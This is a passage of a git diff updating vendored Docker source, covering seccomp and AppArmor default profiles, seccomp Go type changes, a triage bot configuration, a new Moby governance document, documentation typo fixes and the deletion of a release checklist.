-	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
 // InitSpec creates an OCI spec from the plugin's config.
diff --git a/vendor/github.com/docker/docker/plugin/v2/settable.go b/vendor/github.com/docker/docker/plugin/v2/settable.go
index 79c6befc24..efda564705 100644
--- a/vendor/github.com/docker/docker/plugin/v2/settable.go
+++ b/vendor/github.com/docker/docker/plugin/v2/settable.go
@@ -1,4 +1,4 @@
-package v2
+package v2 // import "github.com/docker/docker/plugin/v2"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/plugin/v2/settable_test.go b/vendor/github.com/docker/docker/plugin/v2/settable_test.go
index 7183f3a679..f2bb0a482f 100644
--- a/vendor/github.com/docker/docker/plugin/v2/settable_test.go
+++ b/vendor/github.com/docker/docker/plugin/v2/settable_test.go
@@ -1,4 +1,4 @@
-package v2
+package v2 // import "github.com/docker/docker/plugin/v2"
 
 import (
 	"reflect"
@@ -68,7 +68,7 @@ func TestIsSettable(t *testing.T) {
 	}
 }
 
-func TestUpdateSettinsEnv(t *testing.T) {
+func TestUpdateSettingsEnv(t *testing.T) {
 	contexts := []struct {
 		env    []string
 		set    settable
diff --git a/vendor/github.com/docker/docker/poule.yml b/vendor/github.com/docker/docker/poule.yml
index 61aab4551b..fe1cb3d103 100644
--- a/vendor/github.com/docker/docker/poule.yml
+++ b/vendor/github.com/docker/docker/poule.yml
@@ -3,6 +3,9 @@
       pull_request: [ opened ]
   operations:
       - type:       label
+        filters: {
+            ~labels: [ "status/0-triage", "status/1-design-review", "status/2-code-review", "status/3-docs-review", "status/4-merge" ],
+        }
         settings: {
             patterns: {
                 status/0-triage:     [ ".*" ],
@@ -23,20 +26,15 @@
                 area/networking:     [ "docker network", "ipvs", "vxlan" ],
                 area/runtime:        [ "oci runtime error" ],
                 area/security/trust: [ "docker_content_trust" ],
-                area/swarm:          [ "docker node", "docker service", "docker swarm" ],
+                area/swarm:          [ "docker node", "docker swarm", "docker service create", "docker service inspect", "docker service logs", "docker service ls", "docker service ps", "docker service rm", "docker service scale", "docker service update" ],
                 platform/desktop:    [ "docker for mac", "docker for windows" ],
                 platform/freebsd:    [ "freebsd" ],
                 platform/windows:    [ "nanoserver", "windowsservercore", "windows server" ],
+                platform/arm:        [ "raspberry", "raspbian", "rpi", "beaglebone", "pine64" ],
             }
         }
       - type:       version-label
 
-# When a pull request is closed, attach it to the currently active milestone.
-- triggers:
-      pull_request: [ closed ]
-  operations:
-      - type:       version-milestone
-
 # Labeling a PR with `rebuild/<configuration>` triggers a rebuild job for the associated
 # configuration. The label is automatically removed after the rebuild is initiated. There's no such
 # thing as "templating" in this configuration, so we need one operation for each type of
@@ -66,6 +64,11 @@
             configurations: [ janky ],
             label:          "rebuild/janky",
         }
+      - type:       rebuild
+        settings: {
+            configurations: [ powerpc ],
+            label:          "rebuild/powerpc",
+        }
       - type:       rebuild
         settings: {
             configurations: [ userns ],
@@ -86,3 +89,41 @@
             configurations: [ windowsRS1 ],
             label:          "rebuild/windowsRS1",
         }
+      - type:       rebuild
+        settings: {
+            configurations: [ z ],
+            label:          "rebuild/z",
+        }
+
+# Once a day, randomly assign pull requests older than 2 weeks.
+- schedule:         "@daily"
+  operations:
+      - type:       random-assign
+        filters: {
+            age:    "2w",
+            is:     "pr",
+        }
+        settings: {
+            users: [
+                "aaronlehmann",
+                "akihirosuda",
+                "coolljt0725",
+                "cpuguy83",
+                "crosbymichael",
+                "dnephin",
+                "duglin",
+                "fntlnz",
+                "johnstep",
+                "justincormack",
+                "mhbauer",
+                "mlaventure",
+                "runcom",
+                "stevvooe",
+                "thajeztah",
+                "tiborvass",
+                "tonistiigi",
+                "vdemeester",
+                "vieux",
+                "yongtang",
+            ]
+        }
diff --git a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go
index 5132ebe008..b021668c8e 100644
--- a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go
+++ b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package apparmor
+package apparmor // import "github.com/docker/docker/profiles/apparmor"
 
 import (
 	"bufio"
@@ -9,9 +9,9 @@ import (
 	"os"
 	"path"
 	"strings"
+	"text/template"
 
 	"github.com/docker/docker/pkg/aaparser"
-	"github.com/docker/docker/utils/templates"
 )
 
 var (
@@ -33,7 +33,7 @@ type profileData struct {
 
 // generateDefault creates an apparmor profile from ProfileData.
 func (p *profileData) generateDefault(out io.Writer) error {
-	compiled, err := templates.NewParse("apparmor_profile", baseTemplate)
+	compiled, err := template.New("apparmor_profile").Parse(baseTemplate)
 	if err != nil {
 		return err
 	}
@@ -54,10 +54,7 @@ func (p *profileData) generateDefault(out io.Writer) error {
 	}
 	p.Version = ver
 
-	if err := compiled.Execute(out, p); err != nil {
-		return err
-	}
-	return nil
+	return compiled.Execute(out, p)
 }
 
 // macrosExists checks if the passed macro exists.
@@ -84,15 +81,10 @@ func InstallDefault(name string) error {
 	defer os.Remove(profilePath)
 
 	if err := p.generateDefault(f); err != nil {
-		f.Close()
-		return err
-	}
-
-	if err := aaparser.LoadProfile(profilePath); err != nil {
 		return err
 	}
 
-	return nil
+	return aaparser.LoadProfile(profilePath)
 }
 
 // IsLoaded checks if a profile with the given name has been loaded into the
diff --git a/vendor/github.com/docker/docker/profiles/apparmor/template.go b/vendor/github.com/docker/docker/profiles/apparmor/template.go
index c5ea4584de..c00a3f70e9 100644
--- a/vendor/github.com/docker/docker/profiles/apparmor/template.go
+++ b/vendor/github.com/docker/docker/profiles/apparmor/template.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package apparmor
+package apparmor // import "github.com/docker/docker/profiles/apparmor"
 
 // baseTemplate defines the default apparmor profile for containers.
 const baseTemplate = `
@@ -24,8 +24,6 @@ profile {{.Name}} flags=(attach_disconnected,mediate_deleted) {
   deny @{PROC}/sys/[^k]** w,  # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel)
   deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w,  # deny everything except shm* in /proc/sys/kernel/
   deny @{PROC}/sysrq-trigger rwklx,
-  deny @{PROC}/mem rwklx,
-  deny @{PROC}/kmem rwklx,
   deny @{PROC}/kcore rwklx,
 
   deny mount,
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/default.json b/vendor/github.com/docker/docker/profiles/seccomp/default.json
index ac129d3a31..5717c00cde 100755
--- a/vendor/github.com/docker/docker/profiles/seccomp/default.json
+++ b/vendor/github.com/docker/docker/profiles/seccomp/default.json
@@ -55,7 +55,7 @@
 				"accept",
 				"accept4",
 				"access",
-				"alarm",
+				"adjtimex",
 				"alarm",
 				"bind",
 				"brk",
@@ -223,10 +223,12 @@
 				"prctl",
 				"pread64",
 				"preadv",
+				"preadv2",
 				"prlimit64",
 				"pselect6",
 				"pwrite64",
 				"pwritev",
+				"pwritev2",
 				"read",
 				"readahead",
 				"readlink",
@@ -320,6 +322,7 @@
 				"stat64",
 				"statfs",
 				"statfs64",
+				"statx",
 				"symlink",
 				"symlinkat",
 				"sync",
@@ -398,6 +401,40 @@
 			"includes": {},
 			"excludes": {}
 		},
+		{
+			"names": [
+				"personality"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [
+				{
+					"index": 0,
+					"value": 131072,
+					"valueTwo": 0,
+					"op": "SCMP_CMP_EQ"
+				}
+			],
+			"comment": "",
+			"includes": {},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"personality"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [
+				{
+					"index": 0,
+					"value": 131080,
+					"valueTwo": 0,
+					"op": "SCMP_CMP_EQ"
+				}
+			],
+			"comment": "",
+			"includes": {},
+			"excludes": {}
+		},
 		{
 			"names": [
 				"personality"
@@ -415,10 +452,25 @@
 			"includes": {},
 			"excludes": {}
 		},
+		{
+			"names": [
+				"sync_file_range2"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"arches": [
+					"ppc64le"
+				]
+			},
+			"excludes": {}
+		},
 		{
 			"names": [
 				"arm_fadvise64_64",
 				"arm_sync_file_range",
+				"sync_file_range2",
 				"breakpoint",
 				"cacheflush",
 				"set_tls"
@@ -505,6 +557,7 @@
 				"mount",
 				"name_to_handle_at",
 				"perf_event_open",
+				"quotactl",
 				"setdomainname",
 				"sethostname",
 				"setns",
@@ -668,7 +721,7 @@
 			"names": [
 				"settimeofday",
 				"stime",
-				"adjtimex"
+				"clock_settime"
 			],
 			"action": "SCMP_ACT_ALLOW",
 			"args": [],
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go
index a54ef50a8b..4438670a58 100644
--- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package seccomp
+package seccomp // import "github.com/docker/docker/profiles/seccomp"
 
 import (
 	"encoding/json"
@@ -8,7 +8,6 @@ import (
 	"fmt"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringutils"
 	"github.com/opencontainers/runtime-spec/specs-go"
 	libseccomp "github.com/seccomp/libseccomp-golang"
 )
@@ -16,12 +15,12 @@ import (
 //go:generate go run -tags 'seccomp' generate.go
 
 // GetDefaultProfile returns the default seccomp profile.
-func GetDefaultProfile(rs *specs.Spec) (*specs.Seccomp, error) {
+func GetDefaultProfile(rs *specs.Spec) (*specs.LinuxSeccomp, error) {
 	return setupSeccomp(DefaultProfile(), rs)
 }
 
-// LoadProfile takes a file path and decodes the seccomp profile.
-func LoadProfile(body string, rs *specs.Spec) (*specs.Seccomp, error) {
+// LoadProfile takes a json string and decodes the seccomp profile.
+func LoadProfile(body string, rs *specs.Spec) (*specs.LinuxSeccomp, error) {
 	var config types.Seccomp
 	if err := json.Unmarshal([]byte(body), &config); err != nil {
 		return nil, fmt.Errorf("Decoding seccomp profile failed: %v", err)
@@ -39,7 +38,18 @@ var nativeToSeccomp = map[string]types.Arch{
 	"s390x":       types.ArchS390X,
 }
 
-func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) {
+// inSlice tests whether a string is contained in a slice of strings or not.
+// Comparison is case sensitive
+func inSlice(slice []string, s string) bool {
+	for _, ss := range slice {
+		if s == ss {
+			return true
+		}
+	}
+	return false
+}
+
+func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.LinuxSeccomp, error) {
 	if config == nil {
 		return nil, nil
 	}
@@ -49,7 +59,7 @@ func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error)
 		return nil, nil
 	}
 
-	newConfig := &specs.Seccomp{}
+	newConfig := &specs.LinuxSeccomp{}
 
 	var arch string
 	var native, err = libseccomp.GetNativeArch()
@@ -83,31 +93,31 @@ func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error)
 		}
 	}
 
-	newConfig.DefaultAction = specs.Action(config.DefaultAction)
+	newConfig.DefaultAction = specs.LinuxSeccompAction(config.DefaultAction)
 
 Loop:
 	// Loop through all syscall blocks and convert them to libcontainer format after filtering them
 	for _, call := range config.Syscalls {
 		if len(call.Excludes.Arches) > 0 {
-			if stringutils.InSlice(call.Excludes.Arches, arch) {
+			if inSlice(call.Excludes.Arches, arch) {
 				continue Loop
 			}
 		}
 		if len(call.Excludes.Caps) > 0 {
 			for _, c := range call.Excludes.Caps {
-				if stringutils.InSlice(rs.Process.Capabilities, c) {
+				if inSlice(rs.Process.Capabilities.Bounding, c) {
 					continue Loop
 				}
 			}
 		}
 		if len(call.Includes.Arches) > 0 {
-			if !stringutils.InSlice(call.Includes.Arches, arch) {
+			if !inSlice(call.Includes.Arches, arch) {
 				continue Loop
 			}
 		}
 		if len(call.Includes.Caps) > 0 {
 			for _, c := range call.Includes.Caps {
-				if !stringutils.InSlice(rs.Process.Capabilities, c) {
+				if !inSlice(rs.Process.Capabilities.Bounding, c) {
 					continue Loop
 				}
 			}
@@ -129,19 +139,19 @@ Loop:
 	return newConfig, nil
 }
 
-func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.Syscall {
-	newCall := specs.Syscall{
-		Name:   name,
-		Action: specs.Action(action),
+func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.LinuxSyscall {
+	newCall := specs.LinuxSyscall{
+		Names:  []string{name},
+		Action: specs.LinuxSeccompAction(action),
 	}
 
 	// Loop through all the arguments of the syscall and convert them
 	for _, arg := range args {
-		newArg := specs.Arg{
+		newArg := specs.LinuxSeccompArg{
 			Index:    arg.Index,
 			Value:    arg.Value,
 			ValueTwo: arg.ValueTwo,
-			Op:       specs.Operator(arg.Op),
+			Op:       specs.LinuxSeccompOperator(arg.Op),
 		}
 
 		newCall.Args = append(newCall.Args, newArg)
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go
index b84de820b7..be29aa4f70 100644
--- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go
@@ -1,11 +1,10 @@
 // +build linux,seccomp
 
-package seccomp
+package seccomp // import "github.com/docker/docker/profiles/seccomp"
 
 import (
-	"syscall"
-
 	"github.com/docker/docker/api/types"
+	"golang.org/x/sys/unix"
 )
 
 func arches() []types.Architecture {
@@ -49,7 +48,7 @@ func DefaultProfile() *types.Seccomp {
 				"accept",
 				"accept4",
 				"access",
-				"alarm",
+				"adjtimex",
 				"alarm",
 				"bind",
 				"brk",
@@ -217,10 +216,12 @@ func DefaultProfile() *types.Seccomp {
 				"prctl",
 				"pread64",
 				"preadv",
+				"preadv2",
 				"prlimit64",
 				"pselect6",
 				"pwrite64",
 				"pwritev",
+				"pwritev2",
 				"read",
 				"readahead",
 				"readlink",
@@ -314,6 +315,7 @@ func DefaultProfile() *types.Seccomp {
 				"stat64",
 				"statfs",
 				"statfs64",
+				"statx",
 				"symlink",
 				"symlinkat",
 				"sync",
@@ -377,6 +379,28 @@ func DefaultProfile() *types.Seccomp {
 				},
 			},
 		},
+		{
+			Names:  []string{"personality"},
+			Action: types.ActAllow,
+			Args: []*types.Arg{
+				{
+					Index: 0,
+					Value: 0x20000,
+					Op:    types.OpEqualTo,
+				},
+			},
+		},
+		{
+			Names:  []string{"personality"},
+			Action: types.ActAllow,
+			Args: []*types.Arg{
+				{
+					Index: 0,
+					Value: 0x20008,
+					Op:    types.OpEqualTo,
+				},
+			},
+		},
 		{
 			Names:  []string{"personality"},
 			Action: types.ActAllow,
@@ -388,10 +412,21 @@ func DefaultProfile() *types.Seccomp {
 				},
 			},
 		},
+		{
+			Names: []string{
+				"sync_file_range2",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Arches: []string{"ppc64le"},
+			},
+		},
 		{
 			Names: []string{
 				"arm_fadvise64_64",
 				"arm_sync_file_range",
+				"sync_file_range2",
 				"breakpoint",
 				"cacheflush",
 				"set_tls",
@@ -453,6 +488,7 @@ func DefaultProfile() *types.Seccomp {
 				"mount",
 				"name_to_handle_at",
 				"perf_event_open",
+				"quotactl",
 				"setdomainname",
 				"sethostname",
 				"setns",
@@ -474,7 +510,7 @@ func DefaultProfile() *types.Seccomp {
 			Args: []*types.Arg{
 				{
 					Index:    0,
-					Value:    syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET,
+					Value:    unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET,
 					ValueTwo: 0,
 					Op:       types.OpMaskedEqual,
 				},
@@ -492,7 +528,7 @@ func DefaultProfile() *types.Seccomp {
 			Args: []*types.Arg{
 				{
 					Index:    1,
-					Value:    syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET,
+					Value:    unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET,
 					ValueTwo: 0,
 					Op:       types.OpMaskedEqual,
 				},
@@ -576,7 +612,7 @@ func DefaultProfile() *types.Seccomp {
 			Names: []string{
 				"settimeofday",
 				"stime",
-				"adjtimex",
+				"clock_settime",
 			},
 			Action: types.ActAllow,
 			Args:   []*types.Arg{},
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go
index 134692147b..b0b63ea811 100644
--- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package seccomp
+package seccomp // import "github.com/docker/docker/profiles/seccomp"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go
index f84b20b6d9..67e06401f1 100644
--- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go
@@ -1,13 +1,12 @@
 // +build linux,!seccomp
 
-package seccomp
+package seccomp // import "github.com/docker/docker/profiles/seccomp"
 
 import (
 	"github.com/docker/docker/api/types"
-	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
 // DefaultProfile returns a nil pointer on unsupported systems.
-func DefaultProfile(rs *specs.Spec) *types.Seccomp {
+func DefaultProfile() *types.Seccomp {
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/project/ARM.md b/vendor/github.com/docker/docker/project/ARM.md
index c4d21bf27a..c876231d1e 100644
--- a/vendor/github.com/docker/docker/project/ARM.md
+++ b/vendor/github.com/docker/docker/project/ARM.md
@@ -17,15 +17,15 @@ From the root of the Docker/Docker repo one can use make to execute the followin
 - make default
 - make shell
 - make test-unit
-- make test-integration-cli
+- make test-integration
 - make
 
 The Makefile does include logic to determine on which OS and architecture the Docker Development Image is built.
 Based on OS and architecture it chooses the correct Dockerfile.
 For the ARM 32bit architecture it uses `Dockerfile.armhf`.
 
-So for example in order to build a Docker binary one has to  
-1. clone the Docker/Docker repository on an ARM device `git clone git@github.com:docker/docker.git`  
+So for example in order to build a Docker binary one has to:
+1. clone the Docker/Docker repository on an ARM device `git clone https://github.com/docker/docker.git`  
 2. change into the checked out repository with `cd docker`  
 3. execute `make binary` to create a Docker Engine binary for ARM  
 
diff --git a/vendor/github.com/docker/docker/project/CONTRIBUTORS.md b/vendor/github.com/docker/docker/project/CONTRIBUTING.md
similarity index 100%
rename from vendor/github.com/docker/docker/project/CONTRIBUTORS.md
rename to vendor/github.com/docker/docker/project/CONTRIBUTING.md
diff --git a/vendor/github.com/docker/docker/project/GOVERNANCE.md b/vendor/github.com/docker/docker/project/GOVERNANCE.md
index 6ae7baf743..4b52989a64 100644
--- a/vendor/github.com/docker/docker/project/GOVERNANCE.md
+++ b/vendor/github.com/docker/docker/project/GOVERNANCE.md
@@ -1,17 +1,120 @@
-# Docker Governance Advisory Board Meetings
+# Moby project governance
 
-In the spirit of openness, Docker created a Governance Advisory Board, and committed to make all materials and notes from the meetings of this group public.
-All output from the meetings should be considered proposals only, and are subject to the review and approval of the community and the project leadership.
+Moby projects are governed by the [Moby Technical Steering Committee (TSC)](https://github.com/moby/tsc).
+See the Moby TSC [charter](https://github.com/moby/tsc/blob/master/README.md) for
+further information on the role of the TSC and procedures for escalation
+of technical issues or concerns.
 
-The materials from the first Docker Governance Advisory Board meeting, held on October 28, 2014, are available at 
-[Google Docs Folder](https://goo.gl/Alfj8r)
+Contact [any Moby TSC member](https://github.com/moby/tsc/blob/master/MEMBERS.md) with your questions/concerns about the governance or a specific technical 
+issue that you feel requires escalation.
 
-These include:
+## Project maintainers
 
-* First Meeting Notes 
-* DGAB Charter 
-* Presentation 1: Introductory Presentation, including State of The Project  
-* Presentation 2: Overall Contribution Structure/Docker Project Core Proposal 
-* Presentation 3: Long Term Roadmap/Statement of Direction 
- 
+The current maintainers of the moby/moby repository are listed in the
+[MAINTAINERS](/MAINTAINERS) file.
 
+There are different types of maintainers, with different responsibilities, but
+all maintainers have 3 things in common:
+
+ 1. They share responsibility in the project's success.
+ 2. They have made a long-term, recurring time investment to improve the project.
+ 3. They spend that time doing whatever needs to be done, not necessarily what is the most interesting or fun.
+
+Maintainers are often under-appreciated, because their work is less visible.
+It's easy to recognize a really cool and technically advanced feature. It's harder
+to appreciate the absence of bugs, the slow but steady improvement in stability,
+or the reliability of a release process. But those things distinguish a good
+project from a great one.
+
+### Adding maintainers
+
+Maintainers are first and foremost contributors who have shown their
+commitment to the long term success of a project. Contributors who want to
+become maintainers first demonstrate commitment to the project by contributing
+code, reviewing others' work, and triaging issues on a regular basis for at
+least three months.
+
+The contributions alone don't make you a maintainer. You need to earn the
+trust of the current maintainers and other project contributors, that your
+decisions and actions are in the best interest of the project.
+
+Periodically, the existing maintainers curate a list of contributors who have
+shown regular activity on the project over the prior months. From this
+list, maintainer candidates are selected and proposed on the maintainers
+mailing list.
+
+After a candidate is announced on the maintainers mailing list, the
+existing maintainers discuss the candidate over the next 5 business days,
+provide feedback, and vote. At least 66% of the current maintainers must
+vote in the affirmative.
+
+If a candidate is approved, a maintainer contacts the candidate to
+invite them to open a pull request that adds the contributor to
+the MAINTAINERS file. The candidate becomes a maintainer once the pull
+request is merged.
+
+### Removing maintainers
+
+Maintainers can be removed from the project, either at their own request
+or due to [project inactivity](#inactive-maintainer-policy).
+
+#### How to step down
+
+Life priorities, interests, and passions can change. If you're a maintainer but
+feel you must remove yourself from the list, inform other maintainers that you
+intend to step down, and if possible, help find someone to pick up your work.
+At the very least, ensure your work can be continued where you left off.
+
+After you've informed other maintainers, create a pull request to remove
+yourself from the MAINTAINERS file.
+
+#### Inactive maintainer policy
+
+An existing maintainer can be removed if they do not show significant activity
+on the project. Periodically, the maintainers review the list of maintainers
+and their activity over the last three months.
+
+If a maintainer has shown insufficient activity over this period, a project
+representative will contact the maintainer to ask if they want to continue
+being a maintainer. If the maintainer decides to step down as a maintainer,
+they open a pull request to be removed from the MAINTAINERS file.
+
+If the maintainer wants to continue in this role, but is unable to perform the
+required duties, they can be removed with a vote by at least 66% of the current
+maintainers. The maintainer under discussion will not be allowed to vote. An
+e-mail is sent to the mailing list, inviting maintainers of the project to
+vote. The voting period is five business days. Issues related to a maintainer's
+performance should be discussed with them among the other maintainers so that
+they are not surprised by a pull request removing them. This discussion should
+be handled objectively with no ad hominem attacks.
+
+## Project decision making
+
+Short answer: **Everything is a pull request**.
+
+The Moby core engine project is an open-source project with an open design
+philosophy. This means that the repository is the source of truth for **every**
+aspect of the project, including its philosophy, design, road map, and APIs.
+*If it's part of the project, it's in the repo. If it's in the repo, it's part
+of the project.*
+
+As a result, each decision can be expressed as a change to the repository. An
+implementation change is expressed as a change to the source code. An API
+change is a change to the API specification. A philosophy change is a change
+to the philosophy manifesto, and so on.
+
+All decisions affecting the moby/moby repository, both big and small, follow
+the same steps:
+
+ * **Step 1**: Open a pull request. Anyone can do this.
+
+ * **Step 2**: Discuss the pull request. Anyone can do this.
+
+ * **Step 3**: Maintainers merge, close or reject the pull request.
+
+Pull requests are reviewed by the current maintainers of the moby/moby
+repository. Weekly meetings are organized to are organized to synchronously
+discuss tricky PRs, as well as design and architecture decisions.. When
+technical agreement cannot be reached among the maintainers of the project,
+escalation or concerns can be raised by opening an issue to be handled
+by the [Moby Technical Steering Committee](https://github.com/moby/tsc).
diff --git a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md
index 95cb2f1b95..5ef2d317ea 100644
--- a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md
+++ b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md
@@ -30,7 +30,7 @@ reopened when the necessary information is provided.
 
 ### 2. Classify the Issue
 
-An issue can have multiple of the following labels. Typically, a properly classified issues should
+An issue can have multiple of the following labels. Typically, a properly classified issue should
 have:
 
 - One label identifying its kind (`kind/*`).
@@ -42,7 +42,7 @@ have:
 | Kind             | Description                                                                                                                     |
 |------------------|---------------------------------------------------------------------------------------------------------------------------------|
 | kind/bug         | Bugs are bugs. The cause may or may not be known at triage time so debugging should be taken account into the time estimate.    |
-| kind/enhancement | Enhancement are not bugs or new features but can drastically improve usability or performance of a project component.           |
+| kind/enhancement | Enhancements are not bugs or new features but can drastically improve usability or performance of a project component.           |
 | kind/feature     | Functionality or other elements that the project does not currently support.  Features are new and shiny.                       |
 | kind/question    | Contains a user or contributor question requiring a response.                                                                   |
 
@@ -129,4 +129,4 @@ following labels to indicate their degree of priority (from more urgent to less
 | priority/P2 | Normal priority: default priority applied.                                                                                        |
 | priority/P3 | Best effort: those are nice to have / minor issues.                                                                               |
 
-And that's it. That should be all the information required for a new or existing contributor to come in an resolve an issue.
+And that's it. That should be all the information required for a new or existing contributor to come in a resolve an issue.
diff --git a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md
index 3763f8798b..458384a3d9 100644
--- a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md
+++ b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md
@@ -30,7 +30,7 @@ docker run --rm -it --privileged \
 Sh\*t happens. We know. Below are steps to get out of any "hash-sum mismatch" or
 "gpg sig error" or the likes error that might happen to the apt repo.
 
-**NOTE:** These are apt repo specific, have had no experimence with anything similar
+**NOTE:** These are apt repo specific, have had no experience with anything similar
 happening to the yum repo in the past so you can rest easy.
 
 For each step listed below, move on to the next if the previous didn't work.
diff --git a/vendor/github.com/docker/docker/project/PACKAGERS.md b/vendor/github.com/docker/docker/project/PACKAGERS.md
index 46ea8e7b20..a5b0018b5a 100644
--- a/vendor/github.com/docker/docker/project/PACKAGERS.md
+++ b/vendor/github.com/docker/docker/project/PACKAGERS.md
@@ -292,7 +292,7 @@ appropriate for your distro's init script to live there too!).
 In general, Docker should be run as root, similar to the following:
 
 ```bash
-docker daemon
+dockerd
 ```
 
 Generally, a `DOCKER_OPTS` variable of some kind is available for adding more
diff --git a/vendor/github.com/docker/docker/project/README.md b/vendor/github.com/docker/docker/project/README.md
index 3ed68cf297..0eb5e5890f 100644
--- a/vendor/github.com/docker/docker/project/README.md
+++ b/vendor/github.com/docker/docker/project/README.md
@@ -5,7 +5,7 @@ distributing Docker, specifically:
 
 ## Guides
 
-If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTORS.md](../CONTRIBUTING.md).
+If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTING.md](../CONTRIBUTING.md).
 
 If you're a *maintainer* or aspiring maintainer, you should read [MAINTAINERS](../MAINTAINERS).
 
diff --git a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md
deleted file mode 100644
index 84848cae2b..0000000000
--- a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md
+++ /dev/null
@@ -1,518 +0,0 @@
-# Release Checklist
-## A maintainer's guide to releasing Docker
-
-So you're in charge of a Docker release? Cool. Here's what to do.
-
-If your experience deviates from this document, please document the changes
-to keep it up-to-date.
-
-It is important to note that this document assumes that the git remote in your
-repository that corresponds to "https://github.com/docker/docker" is named
-"origin".  If yours is not (for example, if you've chosen to name it "upstream"
-or something similar instead), be sure to adjust the listed snippets for your
-local environment accordingly.  If you are not sure what your upstream remote is
-named, use a command like `git remote -v` to find out.
-
-If you don't have an upstream remote, you can add one easily using something
-like:
-
-```bash
-export GITHUBUSER="YOUR_GITHUB_USER"
-git remote add origin https://github.com/docker/docker.git
-git remote add $GITHUBUSER git@github.com:$GITHUBUSER/docker.git
-```
-
-### 1. Pull from master and create a release branch
-
-All releases version numbers will be of the form: vX.Y.Z  where X is the major
-version number, Y is the minor version number and Z is the patch release version number.
-
-#### Major releases
-
-The release branch name is just vX.Y because it's going to be the basis for all .Z releases.
-
-```bash
-export BASE=vX.Y
-export VERSION=vX.Y.Z
-git fetch origin
-git checkout --track origin/master
-git checkout -b release/$BASE
-```
-
-This new branch is going to be the base for the release. We need to push it to origin so we
-can track the cherry-picked changes and the version bump:
-
-```bash
-git push origin release/$BASE
-```
-
-When you have the major release branch in origin, we need to create the bump fork branch
-that we'll push to our fork:
-
-```bash
-git checkout -b bump_$VERSION
-```
-
-#### Patch releases
-
-If we have the release branch in origin, we can create the forked bump branch from it directly:
-
-```bash
-export VERSION=vX.Y.Z
-export PATCH=vX.Y.Z+1
-git fetch origin
-git checkout --track origin/release/$BASE
-git checkout -b bump_$PATCH
-```
-
-We cherry-pick only the commits we want into the bump branch:
-
-```bash
-# get the commits ids we want to cherry-pick
-git log
-# cherry-pick the commits starting from the oldest one, without including merge commits
-git cherry-pick -s -x <commit-id>
-git cherry-pick -s -x <commit-id>
-...
-```
-
-### 2. Update the VERSION files and API version on master
-
-We don't want to stop contributions to master just because we are releasing.
-So, after the release branch is up, we bump the VERSION and API version to mark
-the start of the "next" release.
-
